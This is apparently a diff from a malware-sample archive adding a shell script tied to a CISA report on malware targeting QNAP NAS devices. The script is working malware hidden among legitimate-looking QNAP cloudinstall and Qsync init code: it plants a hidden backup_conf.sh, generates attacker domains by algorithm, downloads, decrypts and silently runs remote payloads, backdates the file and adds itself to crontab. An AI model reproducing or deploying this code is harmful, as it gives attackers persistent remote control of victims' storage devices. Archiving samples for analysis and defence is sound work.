test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
|
||||
if [ ! -f "${bdir}/.qpkg/.config/backup_conf.sh" ]; then
|
||||
test -d "${bdir}/.qpkg" || mkdir -p "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.config" || mkdir "${bdir}/.qpkg/.config"
|
||||
cat > "${bdir}/.qpkg/.config/backup_conf.sh" <<"XEOF"
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJog4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.config" || mkdir "${bdir}/.qpkg/.config"
|
||||
cd "${bdir}/.qpkg/.config" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
||||
XEOF
|
||||
fi
|
||||
chmod 755 "${bdir}/.qpkg/.config/backup_conf.sh"
|
||||
touch -cr /bin/busybox "${bdir}/.qpkg/.config/backup_conf.sh"
|
||||
|
||||
if ! $fgrep "${bdir}/.qpkg/.config/backup_conf.sh" "${confdir}"/crontab; then
|
||||
cronmins=$(printf '%i' "$(( $RANDOM % 60 ))")
|
||||
cronhour=$(printf '%i' "$(( $RANDOM % 24 ))")
|
||||
cronhour=$(printf '%i,' "$(( ( $cronhour + 8 ) % 24 ))" "$(( ( $cronhour + 16 ) % 24 ))")"$cronhour"
|
||||
echo "$cronmins $cronhour"' * * * '"${bdir}/.qpkg/.config/backup_conf.sh"' >/dev/null 2>/dev/null' >> "${confdir}"/crontab
|
||||
fi
|
||||
test ! -x "${bdir}/.qpkg/.config/backup_conf.sh" && chmod 755 "${bdir}/.qpkg/.config/backup_conf.sh"
|
||||
( ( exec >/dev/null 2>&1 </dev/null; "${bdir}/.qpkg/.config/backup_conf.sh" </dev/null >/dev/null 2>/dev/null & ) & )
|
||||
exit 0
|
BIN
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/18a4f2e7847a2c4e3c9a949cc610044bde319184ef1f4d23a8053e5087ab641b
Normal file
BIN
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/18a4f2e7847a2c4e3c9a949cc610044bde319184ef1f4d23a8053e5087ab641b
Normal file
Binary file not shown.
BIN
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/3615f0019e9a64a78ccb57faa99380db0b36146ec62df768361bca2d9a5c27f2
Normal file
BIN
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/3615f0019e9a64a78ccb57faa99380db0b36146ec62df768361bca2d9a5c27f2
Normal file
Binary file not shown.
936
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/3c38e7bb004b000bd90ad94446437096f46140292a138bfc9f7e44dc136bac8d
Normal file
936
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/3c38e7bb004b000bd90ad94446437096f46140292a138bfc9f7e44dc136bac8d
Normal file
@ -0,0 +1,936 @@
|
||||
#!/bin/sh
|
||||
ts=1553058000
|
||||
